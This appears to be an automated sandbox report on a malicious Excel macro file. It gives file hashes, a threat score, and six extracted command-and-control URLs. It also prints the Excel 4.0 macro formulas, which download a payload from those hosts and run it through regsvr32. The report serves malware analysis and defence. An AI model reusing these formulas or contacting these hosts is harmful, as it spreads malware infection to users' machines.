General

  • Target

    70335e8651dabcbb1a33724945bf766c1eb718cc113f24fa24e42c5ca3a99f5a

  • Size

    40KB

  • MD5

    76652d1c85c252cd007e9780bbd95907

  • SHA1

    aa935e44e8fe02b527eb43d2d0fc18c416022082

  • SHA256

    70335e8651dabcbb1a33724945bf766c1eb718cc113f24fa24e42c5ca3a99f5a

  • SHA512

    06f16407ca09357e5473e4c93dc0252a13b0ee7dcfd68f2add91ec2673e3f4ec6a772186889f657c96e81eee29c588cb953b1736f2b829e67d7822a811d7f8aa

  • SSDEEP

    768:hqhdomi1DOevZCwtumwyKfcrND59V+L9Rw4eWrXcTqZ0Vf5XJ:Edom4DJwylND59V4jwmXc2CVf5Z

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://nuwayinternational.com/js/ELNnL0in5CbGnHmNc/

http://crm.techopesolutions.com/tttwxore/ihzbh04dT0XaJGAf/

http://techplanbd.xyz/qel424/RSz4/

http://steelcorp-fr.com/wp-content/tmMFW0SOgOjVCO/

https://deine-bewerbung.com/wp-content/TKXpk/

https://livejagat.com/h/L37tCM6ppS/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://nuwayinternational.com/js/ELNnL0in5CbGnHmNc/","..\cre.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://crm.techopesolutions.com/tttwxore/ihzbh04dT0XaJGAf/","..\cre.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://techplanbd.xyz/qel424/RSz4/","..\cre.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://steelcorp-fr.com/wp-content/tmMFW0SOgOjVCO/","..\cre.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://deine-bewerbung.com/wp-content/TKXpk/","..\cre.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://livejagat.com/h/L37tCM6ppS/","..\cre.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\cre.ocx") =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

Files

  • 70335e8651dabcbb1a33724945bf766c1eb718cc113f24fa24e42c5ca3a99f5a
    .xlsm office2007